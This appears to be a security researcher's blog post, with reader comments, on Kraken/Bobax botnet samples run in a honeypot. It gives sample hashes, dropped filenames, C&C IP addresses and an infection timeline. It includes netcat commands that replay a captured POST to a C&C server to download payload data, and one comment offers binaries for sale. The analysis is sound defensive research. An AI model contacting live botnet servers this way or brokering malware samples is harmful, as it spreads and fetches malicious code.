Skip navigation.
Home

Kraken Reverts to HTTP

Following a friendly heads up from someone yesterday morning, I re-loaded the
following Kraken samples into my honeypot:

1d51463150db06bc098fef335bc64971
65b958bf6f5eddca3d9455354af08b6f
6ec7d67d5553cbec2a99c7fbe385a729
7ecef2f126e66e7270afa7b803f715bc
8fd8c67103ec073d9303a7fbc702f89a

and began monitoring them. Each sample proceeded to update itself;
the updated binary is around 160KB, given a random name and
placed in the system32 directory, and no longer has an imagefile icon.

The names/MD5 values of samples I got are:

26bd8e696629edba4a1d610d1062b3f1 jtliutnj.exe
36a8c8cce65c9ab46fca127de9dcc5d1 niksojrjbg.exe
b5f65d971d7362512dafdb473ef5888d xfkmrb.exe
5f94989145b4bf69cf81c223b15ec653 yy.exe
5c9274a4483ed540fd433a2cd885e561 zp.exe

As someone mentioned, it does indeed appear that Kraken/Bobax has changed
(perhaps reverted?) its C&C to HTTP. The honeypot session for
1d51463150db06bc098fef335bc64971 goes something like the following:

UTC 15:30 - Honeypot infected with 1d51463150db06bc098fef335bc64971.
UTC 15:45 - niksojrjbg.exe appears in system32 directory.
UTC 15:50 - Last TCP/UDP 447 packets (host 209.160.65.66) observed.
UTC 16:00 - Spam run commences.
UTC 16:10 - First observed HTTP communication with C&C.

The samples do not appear to be using DNS to obtain IPs of the C&C
servers. The C&C IPs I've been able to identify from the samples are
208.101.52.82, 208.101.54.243, and 208.101.42.28. Communication is
performed by the victim making an HTTP POST (poststring attached);
receipt of binary data with a bogus MIME type follows:

paul:~$ cat kraken.poststring | nc 208.101.52.82 80 > file1
...
paul:~$ cat kraken.poststring | nc 208.101.52.82 80 > file5

paul:~$ for i in file*; do head -n 5 $i; echo '--'; done;
HTTP/1.1 200 OK
Server: Apache
Content-Length: 13958
Connection: Close
Content-Type: video/mpeg
--
HTTP/1.1 200 OK
Server: Apache
Content-Length: 13958
Connection: Close
Content-Type: application/x-tar
--
HTTP/1.1 200 OK
Server: Apache/2.0.54
Content-Length: 13958
Connection: Close
Content-Type: image/gif
--
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 13958
Connection: Close
Content-Type: audio/x-wav
--
HTTP/1.1 200 OK
Server: Apache/1.3.33
Content-Length: 13958
Connection: Close
Content-Type: audio/x-wav

I have 3 or 4 other binaries

I have 3 or 4 other binaries along with the 160,1 atleast seems unique,all maybe.

Im just up 75 a piece,we should make contact.

I'd be interested in more

I'd be interested in more information regarding your Honeypot, especially the Honeypot Session and its Logging Output. Having no experience with High Interaction HoPo's yet: What are you using? Is it Sebek?

about the HoneyPot

Hello,
I'm interested in your honeypot, what the honeypot are you using please?